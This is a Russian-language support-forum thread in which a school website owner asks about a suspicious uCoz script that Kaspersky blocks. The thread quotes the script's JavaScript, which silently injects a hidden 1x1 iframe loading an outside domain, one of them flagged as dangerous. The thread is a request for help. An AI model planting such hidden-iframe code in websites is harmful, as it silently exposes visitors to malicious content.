В исходном коде непонятный фрагмент

голоса: 0

Добрый день, у меня такой же вопрос.

В исходном коде сайта непонятный фрагмент

<script type="text/javascript" src="//s19.ucoz.net/cgi/uutils.fcg?a=uSD&ca=2&ug=4&isp=1&r=0.737759654547055"></script>

периодически скрипт меняет сайт перехода. Касперский блокирует переход по ссылке из этого скрипта. Подскажите, что это и можно ли от этого избавиться? Если не сложно, обьясните, можно ли от этого избавиться самому?

Адрес сайта http://18school.ucoz.net/
Закрыто с пометкой: Ответ получен!
| Автор: | Категория: Безопасность сайта
Закрыт | | Автор: Yuri_Geruk

Ответов: 1

голоса: 0
Предоставьте скриншот отчета антивируса, чтобы было видно на что конкретно он ругается.
| Автор:
Проверьте повторно наличие проблемы. Если сможете предоставить скриншот или текстовый отчет антивируса где он ругался на эту ссылку или конкретный код на сайте в данном скрипте, был бы вам благодарен.
Yuri_Geruk,

Добрый день, извините, фрагмент исчез, наверное отроботала ТП, я ранее туда написал, просто они долго отвечали ( до сих пор не ответили, если честно).

Код в скрипте был такой:

 setTimeout(function(){ 	var statfrm = document.createElement("iframe"); 	statfrm.setAttribute("src","https://zdravselhoz.com/qySpDHxK"); 	statfrm.setAttribute("frameborder","0"); 	statfrm.setAttribute("width","1"); 	statfrm.setAttribute("height","1"); 	statfrm.setAttribute("style","display:none;"); 	document.body.appendChild(statfrm); },2000);

Конкретно на "https://zdravselhoz.com/qySpDHxK" касперский не ругается, но адрес сайта периодически меняется на "http://iofutureisback.com/favicon.ico" и вот уже на него касперский выдает:

13.03.2020 10.49.52;Заблокирован опасный веб-адрес;http://iofutureisback.com/favicon.ico;http://iofutureisback.com/favicon.ico;Веб-адрес;Информация из Kaspersky Security Network;Yandex;03/13/2020 10:49:52

 

Дмитрий Бобров,
Спасибо за информацию!
...